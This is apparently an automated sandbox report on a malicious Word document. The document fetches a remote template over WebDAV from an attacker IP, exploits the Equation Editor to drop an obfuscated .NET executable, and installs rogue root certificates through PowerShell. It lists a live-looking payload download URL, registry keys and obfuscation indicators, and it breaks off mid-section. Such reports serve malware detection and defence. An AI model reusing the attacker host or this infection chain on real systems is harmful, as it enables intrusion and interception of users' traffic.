Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: 0225139776.docx.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\0225139776.docx.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: 0225139776.docx.doc Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 0225139776.docx.doc Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs .Net Code: gdlTCXgjlF System.Reflection.Assembly.Load(byte[])
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs .Net Code: gdlTCXgjlF System.Reflection.Assembly.Load(byte[])
Source: 10.2.millitingacy20306.exe.990000.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0067884F push ebx; ret 9_2_00678853
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00678808 push ebx; ret 9_2_0067884B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00665EDF push cs; retf 9_2_00665EE0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00678282 push ecx; ret 9_2_0067828B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0066C28C pushad ; retn 0066h 9_2_0066C28D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0067448A push ecx; ret 9_2_0067448B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00674492 push ecx; ret 9_2_00674493
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00678292 push ecx; ret 9_2_00678293
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00668F60 push eax; retf 9_2_00668F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0067577E push ecx; ret 9_2_0067577F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00663B32 push FF0067D0h; retf 9_2_00663B89
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00675F0E push edx; ret 9_2_00675F0F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00675F16 push edx; ret 9_2_00675F17
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_006787EA push eax; ret 9_2_006787EB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_006601F4 push eax; retf 9_2_006601F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00675786 push ecx; ret 9_2_00675787
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_002192A9 push esp; retf 10_2_002192AB
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219295 push esp; retf 10_2_00219297
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_002192EA push esp; retf 10_2_002192EB
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_002192FD push ebx; retf 10_2_002192FF
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_002192C4 push esp; retf 10_2_002192C5
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219332 push ebx; retf 10_2_00219333
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219315 push ebx; retf 10_2_00219316
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219346 push ebx; retf 10_2_00219347
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_0021935D push ebx; retf 10_2_0021935E
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D214D push ebx; iretd 13_2_003D21EA
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_006190F8 pushfd ; retn 0056h 13_2_006190F9
Source: H363BpKqz0MdVd7[1].exe.9.dr Static PE information: section name: .text entropy: 7.956942148046824
Source: millitingacy20306.exe.9.dr Static PE information: section name: .text entropy: 7.956942148046824
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, nMkqWItOThCtKV1dNC.cs High entropy of concatenated method names: 'Kheuo1D6E8', 'BxguV3Qqhi', 'Ekhu3erEFX', 'K1BuSMEhnG', 'hCgutOcQoy', 'm0qudKv1sg', 'tWCuZwcH7H', 'OpgubjMPV0', 'V4xukjf6qI', 'j7yu1Wl7Ct'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, R1ccbUdiuKavfKwOiv.cs High entropy of concatenated method names: 'Inr4XVd4yh', 'oMf4Mcjjy9', 'aPj4F5XVJp', 'jet4fyqoyM', 'Wxp4tWvH2P', 'Cm34dp637R', 'mkih4jFitxVROj2J50', 'ubh3YeQ2JsSmMplcdk', 'wVb44itlFy', 'Q3e4UNg7dV'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, piA8kBwf8uSnQBkXIf.cs High entropy of concatenated method names: 'HumZFQTxsI', 'r1rZfAG9Ao', 'ToString', 'jcFZqeXIrG', 'z9BZcGHuTQ', 'w3tZugig2D', 'm4CZRKV25X', 'DwJZl5IMdc', 'cJ2ZXWahIl', 'xdYZMg5m3v'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iCoOLXYlNl0mxrb2OV.cs High entropy of concatenated method names: 'aFdZjcjVBI', 'hSpZ6bVtiH', 'PFHbarDev3', 'nHnb4IPVbV', 'c9tZYJ4ZZQ', 'WYAZhUrd6n', 'kAIZ2JHbA8', 'uK4Zijl1nD', 'giVZE8LiSg', 'cxXZJLtQAH'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, A2Kwk8N6ZXA7TrM6cD.cs High entropy of concatenated method names: 'WMwA3I3W0H', 'SGoASpgd1q', 'mhPABfI8ap', 'zcOA84oPtM', 'bbiAOG9trp', 'Al5ALapfuN', 'BYNAWRqKwP', 'SOcA0nRgsQ', 'gMHAQaBTOo', 'hdWAYDQkWj'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, gp45D2kqZ1t0SupgjDp.cs High entropy of concatenated method names: 'yiAk5HBROL', 'hL3kDKyNLa', 'enDkC153Y4', 'TJfkoWKXLH', 'Pcjk9QDtwV', 'bIhkVmJni8', 'JNtkgqnrch', 'HBYk3aYnav', 'qsqkSIUtJP', 's6bkrDDVQ5'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, A2AAfCzfetqLVaEsaJ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xkVkAo9w72', 'lomktDYGPc', 'LVgkduTyVM', 'R4EkZJc31p', 'V58kbTu9IL', 's6LkkHhHI4', 'FLak1bNu6l'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iMjZsLFxfxH3l8nvPC.cs High entropy of concatenated method names: 'rSIciM7NjJ', 'WWkcEjQPmS', 'OJkcJ5l9At', 'jX7ceZdBe8', 'lmvcmEXkS9', 'Ay1cH2iADI', 'g2Vc7fRXBs', 'qOWcjN0R0J', 'HxWcGkEpS0', 'NX9c6qusdv'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, LB9OfaymN1hyy4IOhE.cs High entropy of concatenated method names: 'Q0IR986xkP', 'c42RgxwxRm', 'sKluIVdjae', 'f2VuOADq56', 'Mc9uLB55Sv', 'XaeuPjYNdQ', 'tjAuWu4F1P', 'dsEu0Yuitq', 'AnGuvCINkQ', 'C0YuQFko7d'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, W2ykdW3Am2b4r0yX4J.cs High entropy of concatenated method names: 'pXqX5qU8lk', 'TBKXDIO1Qd', 'Ux2XCVjY5X', 'yruXo1oBOj', 'IMGX9KgSTq', 'NBdXVKQGP9', 'zG3XgcK9jI', 'FXAX34LLae', 'GxoXSWCPVJ', 'gDcXr5S8IE'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, VIYLCOLmp9IJAk2PZn.cs High entropy of concatenated method names: 'rtik4v0KeY', 'QFjkUuqm3R', 'rlqkTekE4n', 'EwDkqx57ta', 'GWikcnZHJA', 'CCBkR2NFeV', 'vcXkl9Qmdx', 'jDcb7eKMQ7', 'WbrbjHhoH1', 'PaMbGTnyZu'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, HOywRAxWLhf94FxxiR.cs High entropy of concatenated method names: 'G5dbBJQqbo', 'Oeob8MA3Ga', 'bi2bIEwmFj', 'zM3bOXFKyS', 'OPIbinHY0a', 'sYObLugFyu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, lr6D7krRwJpAs5DJI9.cs High entropy of concatenated method names: 'Dispose', 'x754GTAp2J', 'BLcp8labQo', 'gXDssev9mP', 'y6446XUknW', 'd1l4zfevfT', 'ProcessDialogKey', 'BZSpaGEn6c', 'BBGp46UjQU', 'TLbppXEuaP'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, kdgnP2lRDcDXOsF1YV.cs High entropy of concatenated method names: 'th6lNfRi6q', 'noFlcTrRu4', 'zTPlR5HLkM', 'JG3lXfalYL', 'eoPlMLj5nm', 'sJZRmGmGkd', 'i7wRHS6OHB', 'u3YR73qrIn', 'tStRju5BtW', 't1kRGOLlZ0'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, w1hPeBSJBRtHWHPfGs.cs High entropy of concatenated method names: 'zEsXq74pXx', 'JbfXu6BIDA', 'x6TXlpE6NJ', 'eGBl6JIqug', 'Cijlzmr7ff', 'fRWXaCpl1L', 'wfaX4bu5Ik', 'v2kXpkmUXY', 'DPmXU4FONk', 'DMmXTmmagd'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, WxtM0d8xtsSb4gH5rt.cs High entropy of concatenated method names: 'PDRCSE6g3', 'KQ7oSs8Ts', 'ovMVGW9Fh', 'F9sgrK1gC', 'utKSooaNq', 'bV0rWZbG3', 'bdNGekN5d3K4VUNith', 'DKYscp0mbxHK2Jb0yG', 'R9DbHeusW', 'Jcg10ByYf'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, UxbJeVopTxfRmWCZ5e.cs High entropy of concatenated method names: 'ToString', 'iBkdYWrWkG', 'Ot8d8uuUK2', 'DnjdIOoN9V', 'MVKdOphAMO', 'mhmdLgVGr7', 'OlSdPVaK3M', 'IAOdW1X7PW', 'jLsd0Giw4h', 'u9bdvSrutG'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs High entropy of concatenated method names: 'mBgUN13te4', 'R57Uqtu6qQ', 'MnqUcANdqH', 'qZNUuUpaRy', 'jf5URlj3ly', 'FSfUlymF7c', 'EkfUXGByaU', 'bEuUMSC826', 'CITUKvsdI5', 'AlKUFJk1sI'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, Fj4y7cbUAU8ypRwety.cs High entropy of concatenated method names: 'Kgcbq0OGyw', 'IPtbccWnBi', 'gwqbu1SM4h', 'YRMbRi0xTL', 'EIMblIj29V', 'j9HbXEhjrq', 'UL9bMLoC35', 'xrLbKyLKGH', 'QQSbFmDS9r', 'RvnbfCTonl'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, TnNsaokGxfgWcajJlHc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WkX1iPyZcr', 'Awu1Eq6Vhm', 'uTQ1JmViwV', 'En11eYNIFk', 'yyl1mKXgd5', 'btQ1HUcExl', 'ymR17g9Gwx'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, UtxCOWKt6ay2Ld6OyO.cs High entropy of concatenated method names: 'IOEtQ0B1VS', 'heTthRWboI', 'NWvtihJFVv', 'K1itES4Ifn', 'WiCt8fJ2G0', 'DdGtIr6f7Y', 'StgtOoIYmv', 'WxQtLhjWct', 'b3utPNOGP1', 'nM0tW9cKFL'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, nMkqWItOThCtKV1dNC.cs High entropy of concatenated method names: 'Kheuo1D6E8', 'BxguV3Qqhi', 'Ekhu3erEFX', 'K1BuSMEhnG', 'hCgutOcQoy', 'm0qudKv1sg', 'tWCuZwcH7H', 'OpgubjMPV0', 'V4xukjf6qI', 'j7yu1Wl7Ct'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, R1ccbUdiuKavfKwOiv.cs High entropy of concatenated method names: 'Inr4XVd4yh', 'oMf4Mcjjy9', 'aPj4F5XVJp', 'jet4fyqoyM', 'Wxp4tWvH2P', 'Cm34dp637R', 'mkih4jFitxVROj2J50', 'ubh3YeQ2JsSmMplcdk', 'wVb44itlFy', 'Q3e4UNg7dV'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, piA8kBwf8uSnQBkXIf.cs High entropy of concatenated method names: 'HumZFQTxsI', 'r1rZfAG9Ao', 'ToString', 'jcFZqeXIrG', 'z9BZcGHuTQ', 'w3tZugig2D', 'm4CZRKV25X', 'DwJZl5IMdc', 'cJ2ZXWahIl', 'xdYZMg5m3v'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iCoOLXYlNl0mxrb2OV.cs High entropy of concatenated method names: 'aFdZjcjVBI', 'hSpZ6bVtiH', 'PFHbarDev3', 'nHnb4IPVbV', 'c9tZYJ4ZZQ', 'WYAZhUrd6n', 'kAIZ2JHbA8', 'uK4Zijl1nD', 'giVZE8LiSg', 'cxXZJLtQAH'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, A2Kwk8N6ZXA7TrM6cD.cs High entropy of concatenated method names: 'WMwA3I3W0H', 'SGoASpgd1q', 'mhPABfI8ap', 'zcOA84oPtM', 'bbiAOG9trp', 'Al5ALapfuN', 'BYNAWRqKwP', 'SOcA0nRgsQ', 'gMHAQaBTOo', 'hdWAYDQkWj'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, gp45D2kqZ1t0SupgjDp.cs High entropy of concatenated method names: 'yiAk5HBROL', 'hL3kDKyNLa', 'enDkC153Y4', 'TJfkoWKXLH', 'Pcjk9QDtwV', 'bIhkVmJni8', 'JNtkgqnrch', 'HBYk3aYnav', 'qsqkSIUtJP', 's6bkrDDVQ5'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, A2AAfCzfetqLVaEsaJ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xkVkAo9w72', 'lomktDYGPc', 'LVgkduTyVM', 'R4EkZJc31p', 'V58kbTu9IL', 's6LkkHhHI4', 'FLak1bNu6l'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iMjZsLFxfxH3l8nvPC.cs High entropy of concatenated method names: 'rSIciM7NjJ', 'WWkcEjQPmS', 'OJkcJ5l9At', 'jX7ceZdBe8', 'lmvcmEXkS9', 'Ay1cH2iADI', 'g2Vc7fRXBs', 'qOWcjN0R0J', 'HxWcGkEpS0', 'NX9c6qusdv'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, LB9OfaymN1hyy4IOhE.cs High entropy of concatenated method names: 'Q0IR986xkP', 'c42RgxwxRm', 'sKluIVdjae', 'f2VuOADq56', 'Mc9uLB55Sv', 'XaeuPjYNdQ', 'tjAuWu4F1P', 'dsEu0Yuitq', 'AnGuvCINkQ', 'C0YuQFko7d'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, W2ykdW3Am2b4r0yX4J.cs High entropy of concatenated method names: 'pXqX5qU8lk', 'TBKXDIO1Qd', 'Ux2XCVjY5X', 'yruXo1oBOj', 'IMGX9KgSTq', 'NBdXVKQGP9', 'zG3XgcK9jI', 'FXAX34LLae', 'GxoXSWCPVJ', 'gDcXr5S8IE'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, VIYLCOLmp9IJAk2PZn.cs High entropy of concatenated method names: 'rtik4v0KeY', 'QFjkUuqm3R', 'rlqkTekE4n', 'EwDkqx57ta', 'GWikcnZHJA', 'CCBkR2NFeV', 'vcXkl9Qmdx', 'jDcb7eKMQ7', 'WbrbjHhoH1', 'PaMbGTnyZu'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, HOywRAxWLhf94FxxiR.cs High entropy of concatenated method names: 'G5dbBJQqbo', 'Oeob8MA3Ga', 'bi2bIEwmFj', 'zM3bOXFKyS', 'OPIbinHY0a', 'sYObLugFyu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, lr6D7krRwJpAs5DJI9.cs High entropy of concatenated method names: 'Dispose', 'x754GTAp2J', 'BLcp8labQo', 'gXDssev9mP', 'y6446XUknW', 'd1l4zfevfT', 'ProcessDialogKey', 'BZSpaGEn6c', 'BBGp46UjQU', 'TLbppXEuaP'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, kdgnP2lRDcDXOsF1YV.cs High entropy of concatenated method names: 'th6lNfRi6q', 'noFlcTrRu4', 'zTPlR5HLkM', 'JG3lXfalYL', 'eoPlMLj5nm', 'sJZRmGmGkd', 'i7wRHS6OHB', 'u3YR73qrIn', 'tStRju5BtW', 't1kRGOLlZ0'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, w1hPeBSJBRtHWHPfGs.cs High entropy of concatenated method names: 'zEsXq74pXx', 'JbfXu6BIDA', 'x6TXlpE6NJ', 'eGBl6JIqug', 'Cijlzmr7ff', 'fRWXaCpl1L', 'wfaX4bu5Ik', 'v2kXpkmUXY', 'DPmXU4FONk', 'DMmXTmmagd'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, WxtM0d8xtsSb4gH5rt.cs High entropy of concatenated method names: 'PDRCSE6g3', 'KQ7oSs8Ts', 'ovMVGW9Fh', 'F9sgrK1gC', 'utKSooaNq', 'bV0rWZbG3', 'bdNGekN5d3K4VUNith', 'DKYscp0mbxHK2Jb0yG', 'R9DbHeusW', 'Jcg10ByYf'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, UxbJeVopTxfRmWCZ5e.cs High entropy of concatenated method names: 'ToString', 'iBkdYWrWkG', 'Ot8d8uuUK2', 'DnjdIOoN9V', 'MVKdOphAMO', 'mhmdLgVGr7', 'OlSdPVaK3M', 'IAOdW1X7PW', 'jLsd0Giw4h', 'u9bdvSrutG'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs High entropy of concatenated method names: 'mBgUN13te4', 'R57Uqtu6qQ', 'MnqUcANdqH', 'qZNUuUpaRy', 'jf5URlj3ly', 'FSfUlymF7c', 'EkfUXGByaU', 'bEuUMSC826', 'CITUKvsdI5', 'AlKUFJk1sI'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, Fj4y7cbUAU8ypRwety.cs High entropy of concatenated method names: 'Kgcbq0OGyw', 'IPtbccWnBi', 'gwqbu1SM4h', 'YRMbRi0xTL', 'EIMblIj29V', 'j9HbXEhjrq', 'UL9bMLoC35', 'xrLbKyLKGH', 'QQSbFmDS9r', 'RvnbfCTonl'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, TnNsaokGxfgWcajJlHc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WkX1iPyZcr', 'Awu1Eq6Vhm', 'uTQ1JmViwV', 'En11eYNIFk', 'yyl1mKXgd5', 'btQ1HUcExl', 'ymR17g9Gwx'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, UtxCOWKt6ay2Ld6OyO.cs High entropy of concatenated method names: 'IOEtQ0B1VS', 'heTthRWboI', 'NWvtihJFVv', 'K1itES4Ifn', 'WiCt8fJ2G0', 'DdGtIr6f7Y', 'StgtOoIYmv', 'WxQtLhjWct', 'b3utPNOGP1', 'nM0tW9cKFL'
Source: 10.2.millitingacy20306.exe.990000.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

Persistence and Installation Behavior
barindex
Microsoft Office launches external ms-search protocol handler (WebDAV)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\66.63.187.123\DavWWWRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\66.63.187.123\DavWWWRoot Jump to behavior
Contains an external reference to another file
Source: settings.xml.rels Extracted files from sample: http://66.63.187.123/txt/millizxc.doc
Installs new ROOT certificates
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Office viewer loads remote template
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded Jump to behavior
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\millitingacy20306.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe Jump to dropped file
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
